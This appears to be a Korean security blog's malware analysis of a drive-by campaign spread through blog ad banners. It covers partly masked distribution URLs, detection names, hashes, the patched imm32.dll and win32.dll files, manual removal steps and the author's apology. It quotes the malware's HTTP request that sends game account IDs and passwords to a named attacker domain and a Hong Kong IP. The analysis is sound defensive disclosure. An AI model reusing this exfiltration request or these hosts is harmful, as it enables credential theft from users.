특히 해당 악성 스크립트는 토요일(23일)과 일요일(24일)을 비교하였을 경우 경로는 동일하지만 보안 제품의 진단으로 인하여 현재는 변형되었으며 해당 내용은 토요일 기준으로 작성되었음을 밝힙니다.
참고로 해당 악성코드는 최종적으로 기존의 imm32.dll, win32.dll 파일과 유사하므로 참고하시기 바랍니다.
h**p://banner.**get.co.kr/ads/adgetS2.js
h**p://bn.weather*.co.kr/nh/lz.html
ㄴ h**p://bn.weather*.co.kr/nh/q.html
ㄴ h**p://bn.weather*.co.kr/nh/v3.htm
ㄴ h**p://bn.weather*.co.kr/nh/main.swf
ㄴ h**p://coverdance.**oul.co.kr/css/q722.txt
ㄴ h**p://bn.weather*.co.kr/nh/e.htm :: 다운로드 불가
ㄴ h**p://bn.weather*.co.kr/nh/w.html
ㄴ h**p://js.tongji.linezing.com/2259080/tongji.js
사용된 악성 스크립트 진단 상태는 lz.html 파일에 대하여 알약(ALYac) 2.0 보안 제품에서 Exploit.Html.Infected.G 진단명으로 진단되고 있으며, q.html 파일에 대하여 Exploit.JS.Iframe.D 진단명으로 진단되고 있습니다.
실제적으로 진단이 필요한 v3.htm 파일에 대해서는 알약(ALYac) 2.0 보안 제품에서 Exploit.JS.Mult.Swf.F 진단명으로 진단되고 있으며, Adobe Flash Player 취약점을 이용한 main.swf 파일은 Exploit.SWF.Downloader 진단명으로 진단되고 있습니다.
그 외 w.html 파일에 대해서는 Norman 보안 제품에서 JS/ShellCode.B 진단명으로 진단되고 있습니다.
이들 악성코드 유포에 사용되는 취약점은 Windows 보안 업데이트와 Adobe Flash Player 최신 버전 사용으로 근본적인 예방이 가능하므로 업데이트 체크를 반드시 하시고 인터넷을 이용하시기 바랍니다.
최종적으로 다운로드된 암호화된 q722.txt 파일을 실행 가능하도록 한 실행 파일(MD5 : 35767fd7af8fa979bf1344ed0e99f43a)에 대하여 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.imm 진단명으로 진단되고 있습니다.
해당 실행 파일 내부 정보를 확인해보면 안철수연구소(AhnLab)에서 제작한 파일로 위장을 하고 있는 것을 확인할 수 있습니다.
C:\WINDOWS\system32\imm32.dll :: 변경 전 - 110,080 Bytes / 변경 후 - 111,104 Bytes
- MD5 : 150db1e953d8c65d221ffdc58abb302b
- AhnLab V3 : Win-Trojan/Patched.DE (VirusTotal : 32/43)
C:\WINDOWS\system32\imm32.dlllNSD5x.tmp :: 정상 파일
※ 해당 파일은 imm32.dll(6자리 영문+숫자).tmp 형태 파일로 imm32.dll 백업 파일입니다.
C:\WINDOWS\system32\win32.dll :: 시스템(S), 숨김(H) 속성
- MD5 : de0cc2cf4f63f19cf6f2c4b014383f16
- AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 14/43)
C:\WINDOWS\system32\win32.dll.KhbL.tmp :: 정상 파일
※ 해당 파일은 win32.dll.(4자리 영문).tmp 형태입니다.
감염된 파일을 살펴보면 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일을 패치하여 정상 파일은 imm32.dll(6자리 영문+숫자).tmp 파일 형태로 백업을 하고, imm32.dll 파일은 악의적인 기능을 하는 파일로 변경이 이루어집니다.
특히 패치된 imm32.dll 파일의 파일 크기는 유사하며 내부 정보가 동일하므로 사용자 입장에서는 수정된 날짜로 악성 여부를 판단해야 할 것으로 보입니다.
시스템 숨김 속성으로 존재하는 win32.dll(Ahnl2) 파일은 안철수연구소(AhnLab)에서 제작한 파일로 위장하고 있으며, 해당 파일은 알약(ALYac), V3 보안 제품 무력화 기능을 포함하고 있습니다.
win32.dll 파일의 세부적인 기능을 살펴보면 사용자가 해당 파일에서 지정한 프로그램 및 온라인 게임(한게임, 넷마블, 피망, 아이온, 불멸, 마에스티아 등)을 실행하여 로그인을 하는 과정에서 계정 정보를 외부로 탈취하는 행위를 합니다.
GET /nm/post.asp?Game=08¶=q722&ves=009&d00=NAIMA&d01=NAIMA&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=&d31=&d32=&d40=0&d45=0&d42=0&d60=&d61=&d70=0&d71=0&d50=&d90=1348 HTTP/1.1
User-Agent: IE6.0
Host: q722.dfjjke646qw.com
수집된 온라인 게임 계정 정보는 홍콩(HongKong)에 위치한 180.178.41.109 서버로 전송되는 것을 확인할 수 있습니다.
테스트에 사용된 악성코드는 안철수연구소(AhnLab)에서 제공하는 전용 백신(Removal Tool for OnlineGameHack(Integration #2))을 통해 진단 및 치료가 이루어지고 있는 것을 확인하였습니다.
만약 수동으로 문제 해결을 원하시는 분들은 다음 절차에 따라 진행하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)
1. 윈도우 탐색기에서 C:\WINDOWS\system32\imm32.dll 파일을 imm32.dll- 파일로 확장자명을 변경합니다.(※ 해당 파일 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 imm32.dll 파일이 복원되어 생성됩니다.)
2. C:\WINDOWS\system32\win32.dll 파일을 찾아 수동으로 삭제합니다.
win32.dll 파일은 폴더 옵션에서 [보호된 운영 체제 파일 숨기기(권장)] 항목의 체크 해제 및 [숨김 파일 및 폴더 표시] 항목에 체크를 해야지 윈도우 탐색기로 확인이 가능하므로 참고하시기 바랍니다.
3. C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp 파일을 win32.dll.(4자리 영문).tmp- 파일로 확장자명을 변경합니다.
4. 반드시 시스템 재부팅을 합니다.
5. 다음의 파일을 수동으로 삭제하시기 바랍니다.
- C:\WINDOWS\system32\imm32.dll-
- C:\WINDOWS\system32\imm32.dll(6자리 영문+숫자).tmp
- C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp-
이번 악성코드 중에서 [C:\WINDOWS\system32\win32.dll.(4자리 영문).tmp] 파일의 경우 현재 안철수연구소(AhnLab) 전용 백신에서는 Win-Trojan/Infostealer.variant 진단명으로 진단되는 것으로 확인되고 있습니다.
실제 파일 내부를 확인해보면 해당 파일은 lpk.dll(Language Pack) 파일의 백업 파일로 확인되고 있으며, 정상적인 lpk.dll 파일과 비교하여 해시(Hash)값이 동일합니다.
하지만 lpk.dll 파일과 비교를 해보면 보안(Security) 영역에서 일부 권한이 수정된 것을 확인할 수 있는 수정된 파일입니다.
해당 진단의 경우 바이러스토탈(VirusTotal)에서는 진단되지 않고 있지만, 악성코드 감염 또는 악의적인 동작에 필요한 수정이 아닐까 추정됩니다.
어차피 해당 파일도 악성코드 감염으로 인해 생성된 파일 중 하나이며 삭제해도 무방한 파일이므로 참고하시기 바랍니다.
마지막으로 해당 악성코드 유포가 블로그 광고 배너를 통해 유포되었으며, 제가 운영하는 울지않는벌새 블로그에서도 최소 1시간 이상 감염을 유발하였기에 사과를 드립니다.(※ 토요일에 해당 유포를 확인한 즉시 광고 배너를 임시적으로 제거하였습니다.)